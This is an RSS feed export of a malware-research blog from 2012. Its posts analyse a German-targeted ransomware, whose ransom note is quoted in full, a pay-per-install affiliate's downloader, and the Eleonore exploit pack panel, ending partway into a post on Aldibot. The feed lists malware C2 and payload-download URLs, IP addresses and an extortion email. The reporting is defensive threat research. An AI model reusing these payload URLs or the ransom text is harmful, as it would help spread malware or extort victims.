tag:blogger.com,1999:blog-5365964245877416061Sun, 27 May 2012 10:14:28 +0000Italianflash15-MinutReview of the SpyEye Toolkit v1.3.45System Tool911-013-30-35who view my profilKeygenning4newbies CrackMe 1 coded by tHE ANALYSTWapSystwtf seriouslyIframeShop.netAVG Anti-VirusNapal Rogue Buildersecurity tool roguePoint Of Saleflash_player24-tabs.runetox.bizjs.php infectionTDSHack.lu CTF Beer challengeFake InstallerLuTiN NoIR Small RSA keygenme for newbiesQunneDHDD DoctorGold InstallsSexDerevoDisk RecoveryfraudZenk-SecurityTrojan.Ransom Fake Metropolitan Policechk4me.comfacebookkillmbrMalware Auto-downloaderCCSecurity Guard 2012Windows XP Recovery EDSexplorerr.exe(xxxvideo.avi.exe)Dorkbot.AArchSMSPlease bitchz i'm fabulousHackedAWM Antivirus423 877 0158scan4you.netwinlock0012140809940Advanced Virus RemoverpirateCrimepackWireshark Antivirusdiabetal.orgMailienfake defragmentermy-sdesign.comsha1Antivirus Smart ProtectionReplica WatchesWinRARcmapped sizeFake BitDefender 2011WinLocker Builder v0.4 Cracking Generated winlocks27C3Affiliates7xVideo WG1CMCGDISecurity essentials 2010pawn-shop.ccInterviewSalesHackerzvoiceBrowser SMS HoaxXc0d3rredirectorCVE-2011-3544Security essentials 2011BluetrashVertuSecurity ShieldSpyEye Builder v1.2.50 (Botnet cracking session)Trojan.Ransomware keygenRBN Encryptor SoftwareTroj/Ransom-UR3000hackMcafeeInternet Explorer Emergency ModeReady to Ride v3Spyware Protection RemoverYour Windows has been blockedWin32.StartPageTrojan.Ransom Microsoft Security AntivirusApril foolblockerStreamTorrentWizard MobileSoft StoreThree ElephantWinDiskv1.150.1Buy Cheap OEMVertu CashGigabidTROJ_RANSOM.EWQLuo Yun BinDownload binariesRogueAVwinlockerGameAVG AntivirusencodingregeditpaysafecardBraviaxRovnixKeygenMeHTTPBlackSofwareOEM SoftwareTrojan.FakeAV.LVTPPreverseElement ScannerAntivirus Clean 2011Zentom System GuardSystem SecurityTrojan.Ransom (flash_player.exe) 8903452262600 8-903-452-26-2600PharmaTrojan.Ransom: La policía ESPAÑOLAxxx_video_New4.exerequirements specificationDarkCoderScIDA ProFake AVG Anti-VirusХендехохfakePvERansomHelper 1.0 / Malware Auto-downloaderswfNocturne V4java rhinoSergioxddd.66ghz.comSystem Security rogueback-endFake.HDD Master UtilitiesCarderHard Drive crashWayback Machinecustom packerbankingassemblySmart Fortress 20122012crackmeFakeInst8 (906) 096-4547Flash Playerbosi.suAntimalware DoctorgateFakePoliceAlertDemystifyingPhoenixhomoblockerxm-917xTUBEasmlifeMake usersCreating a online Ransomware unlockerKeygenningCidoxfake documentsMalware Auto-downloader v1.3b xyliboxEncryption virusSoftware SellersWinScanHO HO HOParental Lockvirussign(3).execryptovirusAESTraffic Distribution SystemSmoke Botlulzsec.suPharmIncomeTracking Cyber Crime: Zip Archive Affiliate (Hoax SMS/Fake Installer)MAD 1.7kaspepsky.rubastard.subooksnetdownloads.comRSASystem Antivirus Microsoft 2011gbot.exeTrojan.Ransom (Pornoblocker)exploit kityambaclick.comSpyEye v1.3.xZaxarПантераMemScan:Trojan.KillMBR.S24hourdrugsource.comAVE-Set Antivirus 2011bhstatCleanThisvideograbber.dllInternet Security 2010acid.david9 ransomlockreversingzip-help.comXORSystem plugin at address 0x3BC3 got critical errorWindowsToolCredit CardsW32.XoristOperaVertuCashfakeavGagarincashfileunblock gmail.comcracked as usualSkimmershappy new year10293838Tracking Cyber Crime: Golden Ducatcybercrimeieup.co.ccsee ya in 2012VirusKeeper89060964547Internet Security 2012web.archive.orgsecurity-center inbox.ltMeetingTracking Cyber Crimeblacksoftware.ccclick fraudNapalm Rogue BuilderSmart Anti-Malware Protectionpay per installprimitive RunPEgreatbooksdownloads.comporn2o-rolik2.avi.exeWin32.AdwareRSA-1024mybooksplace.comGTA2AdultSecurity ScannerPrivatCoinekoparty Security Conference 6 - Challenge ESET 2010Home Safety EssentialSpamgradebooksonline.comFake installersMilestone AntivirusFast DiskSpyEyesecurity116yourbookdownloads.comdefragerGpCodeCN1stealAffiliateFragus Exploit KitcpaleadInternet Security GuardBrand SoftwareTrojanRansom.XoristFake.HDDMayachokPalladium ProSpyware ProtectionSecurity ProtectionHow to submit a sample to antivirus companiesFindWindowANRBSecurity Shield 2011Antivirus AntiSpyware 2011KEYGENiNG FooMe 1 With XylitolPrivate AV CheckerSecurity CenterAntivirus GTTotal security 2009Cold$ealMultirogue77.221.149.219AV-AFF.BIZWindows Software ProtectionCenterCashhackforumLame winlockFilecoderVulnerabilitiesukashvkpay inbox.ruMBRLocker Builder v0.1Antivir 2010CRC32Brainfuckfake drafragSpanish VersionTrojan.MBRlockTrojan.Ransom (flashplayer.exe)File Secure 2.1trizonta.ruGendarmerie NationaleMalwarebytes' Anti-MalwareTrojan.Ransom (userinit.exe)Money Racing AVpwningFake scanner pageLock Em AllWeird ransomwareSeftadTrojan.Gpcoder.GEsSandRe crackmeA-Fast Antivirus rogue keygenCloud ProtectionWindows Problems ProtectorDebugEvaPharmacyXSSstubsPlastic serviceTuringYour PC ProtectorOther Equipment Manufacturer184.107.77.70winlockswe-deal.netPlaystationTrojan.Ransom (porno-rolik.avi.exe)4Bru-tabs.ruCode CaveGribodemonsaliter.exeeasy2in1pill.com89261072166Merry christmasPPIThePefectTime.ruBlack Software7xVideo365pillsmalwaresJava AtomicpornozudANDI RAZVAN SIMIONAV Security EssentialsChameleon roguePrivacy ProtectionTracking Cyber Crime: AV-AFF.BIZSKY-LoaderSystem plugin at address 0x00874324 got critical errorasm.yeah.netthebookssellers.comWriteProcessMemoryThinkPointGuard OnlineBackdoor.IRCHack.lu 2k10 CTF "Pirates crackme" write-up Zenk-SecurityCatTradePvPbestavsoft2Java.SMSSendAvastSmart Protection 2012all your base are belong to usCardinglockscreenAvast-antivirus-francais.exeMalware Destructor 2011yandex.ruCashPartnersrogueMalwoxHC StealerFragusXP Home Security 2011Android.SpitmoMillenium-ServersPaypalrupoppers.comWindowsWebSecurity.exeSurething TeamfrmcpcryptolibDelFiles7304461.exeXJR AntivirusuTorrentzipmonster.ruprivate_brute.exeMalware Auto-downloader v1.7pornoplayer.exeCodeID CardsSTR. DACIA 73keyloggerBlackhole exploit kit v1.1.0Personal Shield ProZeuSMalware Auto-downloader v1.6Xylibox Malware Challenge 2# - SolvedMyFullzAlureonSolutionSpyEye 1.3.41FagsEroDerevoWolfram AntivirusSUTRASunWatches.ruTrojan.KillFilesExManoizeAV Guard OnlineTrojan:Win32/Ransom.BQpremiumphones.ruSpyEye v1.1.39 unpackeddigitalbooksonlinenow.comWin32:KillMBR-DTrojan-Ransom.Win32.XoristAdslockXylibox Malware Challenge 2# - RogueLockrutabletki.comBTCKitDecoding Security Shield Fake scanner pageMBR.NETA "Loader" CasebestAVblackholeFUDWinRAR 2011car documentsKeyGenMe for Newbies :: Progressive KeygenMe #1XP Anti-Spyware 2011Best Virus ProtectionUnxoring TR.Ransom.XoristVideo Grabberreplicaiphone.ruSecurity Solution 2011BitDefender Antivirus Pro 2011cpSkimmerAntivirii 2011safe-data.ruRippedVirtualizationuselessHow to debug MBR Ransomwarepassportsupdatemalware reversingElgamalgaySecurity Essentials Ultimate PackBHOpenCloud AntivirusExploitAdvanced Security Tool 2010 Security Central Home Personal Antivirus XP Deluxe Protector Win PC Antivirus Win PC Defender XP Police Antivirus IE-Security WinDefender 2009 and Total Secure 2009 rogueCoguarMalware Protection3c09a47b4a673a9e46cb0de70b02454dSpitmobadbase.rusuper-socks.comphishingbeware of fake banking applicationsTrojan.Ransom (flash_player.exe)sqlFakeAV GUIBlackhole v1.2.17*108#VAN32SantanderSkimmingngrBotunpackATMAviraSpyEye v1.3obfuscatedpornoblocker5919019953695Sakura Exploit Pack 1.0base64Yamba networkkeygenBitDefender_Antivirus_Pro_2011.exe410011066189985thesoftwaresellers.comRogue-Security-Product-As-A-ServiceHoaxSMSSKY-Loader v.1.2SMSzarkaa.infoNCRPaypal shopFake MSE Alertluxcash.ruCrackingluoyunbinMS Removal ToolTrojan.Ransom (bioritm.exe)Security Sphere 2012unpackedSystem CheckSpyEye v1.2.99 lamedriving licenseSysinternals AntivirusUmbrellaRansomwareBrand Name SoftwinADToXiiCInternet Security 2011 roguevariantesigfake pharmaMADAntivirus7 Antivirus8Antivirus ProtectionFake scanner source codeWatch4.ruunpackingOEMobfuscationSpyEye Builder v1.1.39 (Botnet cracking session)javascriptWindows Oversight CenterFake SitePay For InstallCryptoServiceHome Security SolutionsRansomware Targeting AmericansTrojan.KardphisherWindows XP Restoreukrtabletki.comya-snimu-egoDieboldStimul PremiumAntivir Solution Pro AV Security Suite AntiSpyware Soft Antivirus Suite Antivirus Soft clone RogueSecurity DefenderSystem FixBRASOV (Romania)Windows Threats DestroyerTracking Cyber Crime: BestAV and BlackSofware *Reloaded*VertexNet v1.1.1 LoaderFakealertsdoktordick.comSilence WinlockerGood MemoryHarm.Win32.FakeMbr.aAvast.exeFuLLzBlackhole exploit kit v1.2.0GPcoder.jSpyEye variantTotalProtectphpAntivirus 7Sadokstar-stat.comCycbotXylitol is powerfulAntivirus 8pornoplayerFake Windows ActivationSpyEye v1.3 interfaceTrojan.Ransom (virussign.exe)BotnetHoaxWinLocker Builder v0.2 Cracking Generated winlocksAV Security 2012Antimalware PC SafetyWaveASMfile35820289892.exeDisk OptimizerlockerPhoenix Exploit KitZip-WapMalware Protection CenterCigIncomemalwareyambaprivate.comhashXSSedRançongicielSpambotcode sourceassemblerTrue Big CashLizamoon varianteEleonoreSUTRA TDSInstall_Flash-Player.exeInside the FakeAV Businesscrypto/hash/calc toolsdrizz7xVideo D1DelphipornorolikCarberpCCCSpyEye Builder v1.2.60NortonWindows DiskTrojan.Win32.KillMBR.awCoreguard Defense Center Protection Center Data Protection Digital Protection Your Protection User Protection Dr. Guard Paladin Antivirus AnVi RogueloaderXylitolRansomware who XOR your fileUFDCransomМеркурийallocated memorylockEncoder Builder v2.31Computer is blockedvertudiamond.ruOrgiGuruDrugstorebankerCigarettesTrojan.Ransom BKA Ransomwaresee ya in 2k12wlnrar-auth5.netukr-tabs.ruMyReplica.ruVMwareYambo FinancialsLuxury CashTR/FraudransomblockTracking Cyber Crime: Virtest and Palevo (Private AV Checker) pwnedAntivirus 2011wormEssential CleanerOficlaWindows license lockeddd2.ru89653751844SpyEye Builder v1.1.39WinRARSMSSendTrojan.Ransom (HomoBlocker)Contemporary Profiling of Web UsersDr.WebclientSeveracc-grabbers admin panel bender editionFakeHDDWinlock Builder [Private] v1.30Trojan.RansomwareTracking Cyber Crime: WinAD gang (Ransom.DN/Win32.Timer) Traffic Distribution SystemAldibotVB6 VirusTotal Mass rating toolTrojan.Ransom (Lock Em All)Xyliboxluvservice.beSysinternals Antivirus XJR Antivirus AKM Antivirus 2010 Pro Your PC Protector Wireshark Antivirus rogueblockedRev0LtUniversité Française de Crackingback soonBAT.KillFilesPC Defender antivirus rogueXP Total Security 2011Fake KasperskyBlackhole Exploit KitupxRansomlockTrojan.Win32.KillMBRresellerPEcompact2Web RATWin32.BuzusRSA javascriptXP Anti-Virus 2011Another cc-grabbers admin panelGCodeRogueVirtualProtectExGpCode 2010Trojan.HDDKill.517stealerAdvanced PC Shield 2012Adwarehotwatches.ruSakura exploit kitIntroduction au cracking sous Linuxavastfrance.comPOSVirusTotalBombacashTrojan.Ransom.BootsacemGEMASpyEye v1.3.39zip-archive.comFakeAV SiteTracking Cyber Crime: Ready to Ride v3 (Win32/Cycbot Affiliate)Lux CashSpyEye 1.3.48U235459552163Phoenix Exploit Kit 3.1Adslock.ACaixa PenedèsCracking SpyEye 1.3.xZipArchive0973467457475070215340537432225FLASH10.exeHoax SMSLamersiferrari.rusevantivir.comRemoval GuideAKM Antivirus 2010 ProXorist.cSystem Security 2011FakeAV BusinessCVE-2010-1885Tritaxlamemulti-scan.comTotal ProtectBooks SellersMemory OptimizerU157727070520rx-partners.bizFake E-Set Antivirus 2011av checkerxxx_video_32605.avi.exemalware unpackingbundespolizeiSecurity Monitor 2012Trojan.KillMBR.apmainpanelHadèsKeyFirefox_update.exeMalware Auto-downloader v1.5 xyliboxSpyEye 1.3.45ProfitBins.ruvariablesmscheck.hispamediamarketing.comcodingscreenshotTrojan.Ransom (flash_player.exe variant)proxiesSuper AVMalware Auto-downloader v1.4 xyliboxWinlocker builderHerpesMalware Auto-downloader v1.7 Revision 3Digital StoreZwResumeThreadMystic CompressorEleonore Exploits pack v1.2winlock targeting French peoplefindvirus.ruинфаTrojan.RansomMISCLock Em All varianteDSC0912637.scr a194e793d739fb40b217b5775a6c7250 BR malwareHyperliskXP Internet Security 2011pwnedTeamkNastfemale-orgazm.comQuickBasicSecurity essentials 2011 Security essentials 2010 Internet Security 2010 Advanced Virus RemoverBlueFlare AntivirusAndroidlinuxMobileHDD Defragmenter System Defragmenter rogueAES cryptovirus GpCode 2011 GPcoder.j RSA-1024 Troj/Ransom-U TROJ_RANSOM.EWQ Trojan.Gpcoder.G Trojan:Win32/Ransom.BQ RansomwareSecurity Shield Pro 2011AES cryptovirus GpCode 2011 GPcoder.j RSA-1024 Troj/Ransom-U TROJ_RANSOM.EWQ Trojan.Gpcoder.G Trojan:Win32/Ransom.BQ Ransomware Trojan-Ransom.Win32.Gpcode.bnAntimalware Toolcardsmarket.sumulti-roguevb6Security ToolSEOishygddtmalwox.bizWaterEffect4093245501AV Protection OnlineWin32/Kelihos.BfailWindows Scanvideo72.avi.exe+16464816878XyliBoxAnother blog, Another box.http://www.xylibox.com/noreply@blogger.com (Steven K)Blogger456125tag:blogger.com,1999:blog-5365964245877416061.post-1569204964036596360Sat, 26 May 2012 14:22:00 +00002012-05-26T16:22:58.905+02:00winlocksecurity-center inbox.ltRansomwarev1.150.1XylitolPlease bitchz i'm fabulousWhat the...<img border="0" src="http://4.bp.blogspot.com/-YouXhaQCws4/T8DhuoYIUAI/AAAAAAAAGPY/Sx9dL-5bm8w/s1600/icons.PNG" /><br />Got contacted yesterday, about a threat.<br />A ransomware who target german people use actually a crypter... and a message was leaved to me on the stub...<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-VF--RprvB9M/T8DduHzcXHI/AAAAAAAAGO0/1DqG9A0OS9M/s1600/Olly.1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="258" src="http://2.bp.blogspot.com/-VF--RprvB9M/T8DduHzcXHI/AAAAAAAAGO0/1DqG9A0OS9M/s400/Olly.1.PNG" width="400" /></a></div><br />When unpack it's just some deja-vu:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-GMI9oX2xWq0/T8DhD1a60zI/AAAAAAAAGPQ/CLX3h5SF1t0/s1600/Olly.2.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://1.bp.blogspot.com/-GMI9oX2xWq0/T8DhD1a60zI/AAAAAAAAGPQ/CLX3h5SF1t0/s400/Olly.2.PNG" width="312" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-z2DxjMZkjks/T8DiBopuGII/AAAAAAAAGPg/UlwMr1m0xGY/s1600/ransom.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://4.bp.blogspot.com/-z2DxjMZkjks/T8DiBopuGII/AAAAAAAAGPg/UlwMr1m0xGY/s400/ransom.PNG" width="400" /></a></div><br />A file "ACHTUNG-LESEN.txt" is leaved on the desktop<br /><div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;">Sehr geehrte Damen und Herren,<br />anscheinend wurde das Update Programm vollständig unterbrochen. Jetzt kann das Virus nur manuell beseitigt werden. Dies brauchen Sie um Ihre Dateien benutzen zu können. Falls Sie also die gesperrten Daten brauchen, senden Sie uns bitte 200 Euro Ukash Code an die Email: security-center@inbox.lt, so bald dieser Code geprüft wurde, erhalten Sie ein Update Programm. Falls Sie Ihre Daten nicht brauchen raten wir Ihnen dringend Ihren Computer zu formatieren um den Virus vollständig zu entfernen. Ukash können Sie an einer beliebigen Tankstelle erwerben und auch in mehreren Internetcafes in Ihrer Nähe.<br />mfG Ihr Security Team</div><br />And everything is encoded<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-AWyIowIcnIw/T8DkQ924EkI/AAAAAAAAGPo/Y6puSpoEPME/s1600/encoded.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://1.bp.blogspot.com/-AWyIowIcnIw/T8DkQ924EkI/AAAAAAAAGPo/Y6puSpoEPME/s400/encoded.PNG" width="400" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-1569204964036596360?l=www.xylibox.com' alt='' /></div>http://www.xylibox.com/2012/05/what.htmlnoreply@blogger.com (Steven K)6tag:blogger.com,1999:blog-5365964245877416061.post-2563861059850484974Wed, 23 May 2012 21:56:00 +00002012-05-23T23:56:35.551+02:00PPIGold InstallsAffiliateprimitive RunPEFUDSmoke BotGold Installs AffiliateAdvert:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-7XILv-mAi-U/T7yEkx36kbI/AAAAAAAAGKY/cRyDVUCL8u0/s1600/GoldInstalls.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://3.bp.blogspot.com/-7XILv-mAi-U/T7yEkx36kbI/AAAAAAAAGKY/cRyDVUCL8u0/s400/GoldInstalls.PNG" width="400" /></a></div><br />ICQ:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-MUeENrdkuyI/T7yDwA18DHI/AAAAAAAAGKQ/wWTQTOosvkg/s1600/ICQ.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://1.bp.blogspot.com/-MUeENrdkuyI/T7yDwA18DHI/AAAAAAAAGKQ/wWTQTOosvkg/s400/ICQ.png" width="353" /></a></div><br />Login:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-BWK6E5VLxdk/T7yE6c39XxI/AAAAAAAAGKg/U6K6Bm5wUlQ/s1600/1.login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-BWK6E5VLxdk/T7yE6c39XxI/AAAAAAAAGKg/U6K6Bm5wUlQ/s400/1.login.png" width="400" /></a></div><br />News:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-WjTY0ImtVac/T7yDIPQj7qI/AAAAAAAAGJg/PsE1WzhJTbE/s1600/2.news.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://3.bp.blogspot.com/-WjTY0ImtVac/T7yDIPQj7qI/AAAAAAAAGJg/PsE1WzhJTbE/s400/2.news.png" width="400" /></a></div><br />EXE:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-Dx67QVuBYGI/T7yDL5tB9FI/AAAAAAAAGJo/QzyFmmrlkz0/s1600/3.exe.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://2.bp.blogspot.com/-Dx67QVuBYGI/T7yDL5tB9FI/AAAAAAAAGJo/QzyFmmrlkz0/s400/3.exe.png" width="400" /></a></div><br />AV test (FUD):<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-cOXLKT6EmNg/T7yDR6cnuAI/AAAAAAAAGJw/cF5wTF_HQeo/s1600/avtest.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="317" src="http://1.bp.blogspot.com/-cOXLKT6EmNg/T7yDR6cnuAI/AAAAAAAAGJw/cF5wTF_HQeo/s400/avtest.png" width="400" /></a></div><br />Withdraw:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-96RF6oH8poE/T7yDfGlDDQI/AAAAAAAAGJ4/WVAEZSNoPpI/s1600/5.withdraw.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-96RF6oH8poE/T7yDfGlDDQI/AAAAAAAAGJ4/WVAEZSNoPpI/s400/5.withdraw.png" width="400" /></a></div><br />Profile:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-vFKXdkNruIQ/T7yFaM3UWmI/AAAAAAAAGKw/SrxDAabyA7Y/s1600/6.Profile.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://2.bp.blogspot.com/-vFKXdkNruIQ/T7yFaM3UWmI/AAAAAAAAGKw/SrxDAabyA7Y/s400/6.Profile.png" width="400" /></a></div><br />FAQ:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-uKaFqxCt_w4/T7yFPrvA0YI/AAAAAAAAGKo/CWud-SIgiGU/s1600/7.FAQ.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="http://3.bp.blogspot.com/-uKaFqxCt_w4/T7yFPrvA0YI/AAAAAAAAGKo/CWud-SIgiGU/s400/7.FAQ.png" width="400" /></a></div><br />0/42 according to VT:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-v_h2-cxECe8/T7yFvgOPAII/AAAAAAAAGK4/xzwI-kc9w0c/s1600/FUD.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="http://4.bp.blogspot.com/-v_h2-cxECe8/T7yFvgOPAII/AAAAAAAAGK4/xzwI-kc9w0c/s400/FUD.png" width="400" /></a></div><br />The EXE downloaded from the panel "653b009465_127_u.exe" is a downloader/loader with a primitive RunPE and some anti-vm:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-zO5GbBCFprI/T7yMmytP6nI/AAAAAAAAGLY/o4hI7ZvhcrQ/s1600/paked.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="397" src="http://4.bp.blogspot.com/-zO5GbBCFprI/T7yMmytP6nI/AAAAAAAAGLY/o4hI7ZvhcrQ/s400/paked.PNG" width="400" /></a></div><br />&nbsp;Download files:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-CfrLwoC6wRA/T7yJCmKxVyI/AAAAAAAAGLE/lttZ6cMcdQU/s1600/downloader_unpacked.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://3.bp.blogspot.com/-CfrLwoC6wRA/T7yJCmKxVyI/AAAAAAAAGLE/lttZ6cMcdQU/s400/downloader_unpacked.PNG" width="333" /></a></div><br />Downloaded file 'id.exe' is just here to update gold installs statistic:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-2wz_SGPYWs8/T7yJ_tbljGI/AAAAAAAAGLM/heCI6dg58Dc/s1600/id.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://1.bp.blogspot.com/-2wz_SGPYWs8/T7yJ_tbljGI/AAAAAAAAGLM/heCI6dg58Dc/s400/id.png" width="252" /></a></div><br />'sm.exe' is a Smoke Bot and for asd.exe the file don't exist on the server...<br /><br /><div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;">• dns: 1 ›› ip: 91.218.38.153 - adresse: GAMEFANS.EU<br />• dns: 1 ›› ip: 91.218.38.153 - adresse: BCIOJEZTEUUEBX.IN<br />http://bciojezteuuebx.in/syst/guest.php<br />http://bciojezteuuebx.in/syst/control.php<br />http://bciojezteuuebx.in/ftp/ppi/127/id.exe <br />http://bciojezteuuebx.in/ftp/ppi/127/sm.exe <br />http://bciojezteuuebx.in/asd.exe<br /><br />• dns: 1 ›› ip: 46.4.51.177 - adresse: GOLDINSTALLS.ORG</div><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-emLH7ko1V9M/T71b18WiFCI/AAAAAAAAGNM/TaNGt09jlyI/s1600/Asuka.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://4.bp.blogspot.com/-emLH7ko1V9M/T71b18WiFCI/AAAAAAAAGNM/TaNGt09jlyI/s400/Asuka.jpg" width="400" /></a></div>End of Eva... "what the f@#$ did i just watch?!"<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-2563861059850484974?l=www.xylibox.com' alt='' /></div>http://www.xylibox.com/2012/05/gold-installs-affiliate.htmlnoreply@blogger.com (Steven K)3tag:blogger.com,1999:blog-5365964245877416061.post-3965749977151789915Sat, 19 May 2012 05:00:00 +00002012-05-19T07:00:35.726+02:00Eleonore Exploits pack v1.2ExManoizeEleonoreEleonore Exploits pack v1.2Found on MDL, Not really interesting but posting anyway.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-6KZrVBKAFQQ/T7a9dlqD3DI/AAAAAAAAGIY/0jX_lU1RMQQ/s1600/18-05-2012+23-21-14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="365" src="http://1.bp.blogspot.com/-6KZrVBKAFQQ/T7a9dlqD3DI/AAAAAAAAGIY/0jX_lU1RMQQ/s400/18-05-2012+23-21-14.png" width="400" /></a></div><br />Login:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-RrqlB8dev-s/T7a8V5P39_I/AAAAAAAAGHw/NUNzLtYyljU/s1600/18-05-2012+23-16-54.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://3.bp.blogspot.com/-RrqlB8dev-s/T7a8V5P39_I/AAAAAAAAGHw/NUNzLtYyljU/s400/18-05-2012+23-16-54.png" width="400" /></a></div><br />Statistics:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-Paze189LyPc/T7a8k2dpYjI/AAAAAAAAGH4/WTBKRIGwukI/s1600/18-05-2012+23-17-47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://3.bp.blogspot.com/-Paze189LyPc/T7a8k2dpYjI/AAAAAAAAGH4/WTBKRIGwukI/s400/18-05-2012+23-17-47.png" width="365" /></a></div><br /><br />iframe:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-BfvBNEc692g/T7a8w43g6vI/AAAAAAAAGIA/JGnvDHJZZlY/s1600/18-05-2012+23-18-42.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://3.bp.blogspot.com/-BfvBNEc692g/T7a8w43g6vI/AAAAAAAAGIA/JGnvDHJZZlY/s400/18-05-2012+23-18-42.png" width="400" /></a></div><br /><br />Referer<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-SmIBtXDr2t8/T7a853hob_I/AAAAAAAAGII/Pe1T5JZd76I/s1600/18-05-2012+23-19-21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://4.bp.blogspot.com/-SmIBtXDr2t8/T7a853hob_I/AAAAAAAAGII/Pe1T5JZd76I/s400/18-05-2012+23-19-21.png" width="400" /></a></div><br />Country:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-maGZtI6Xndk/T7a9MOYQ-2I/AAAAAAAAGIQ/e7noudCHeVs/s1600/18-05-2012+23-20-29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-maGZtI6Xndk/T7a9MOYQ-2I/AAAAAAAAGIQ/e7noudCHeVs/s400/18-05-2012+23-20-29.png" width="400" /></a></div><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-YaJIwQzbE10/T7a_5Zegc3I/AAAAAAAAGIg/XtpkV3LbJ9I/s1600/upt.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://2.bp.blogspot.com/-YaJIwQzbE10/T7a_5Zegc3I/AAAAAAAAGIg/XtpkV3LbJ9I/s400/upt.jpg" width="283" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-3965749977151789915?l=www.xylibox.com' alt='' /></div>http://www.xylibox.com/2012/05/eleonore-exploits-pack-v12.htmlnoreply@blogger.com (Steven K)0tag:blogger.com,1999:blog-5365964245877416061.post-6071480593196412373Tue, 08 May 2012 23:34:00 +00002012-05-09T01:38:56.746+02:00HC StealerTeamkNastLamersAldibotAldibotGot this comment yesterday<br /><br /><center><img border="0" src="http://2.bp.blogspot.com/-Jot61s8Mujo/T6mSpnouTiI/AAAAAAAAGBg/9Z5UhtArZeg/s1600/08-05-2012+23-21-32.png" /></center><br />Alright, let's give a shit.<br /><br /><br />&nbsp;Login:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-Eq7XbF2aR_k/T6mSueyZT8I/AAAAAAAAGBo/akS-pP44T7E/s1600/1.login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://4.bp.blogspot.com/-Eq7XbF2aR_k/T6mSueyZT8I/AAAAAAAAGBo/akS-pP44T7E/s400/1.login.png" width="400" /></a></div><br />Stats: <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-8niFf6Tgvws/T6mSyRLBgfI/AAAAAAAAGBw/QOimapOkGrE/s1600/2.stats.png" 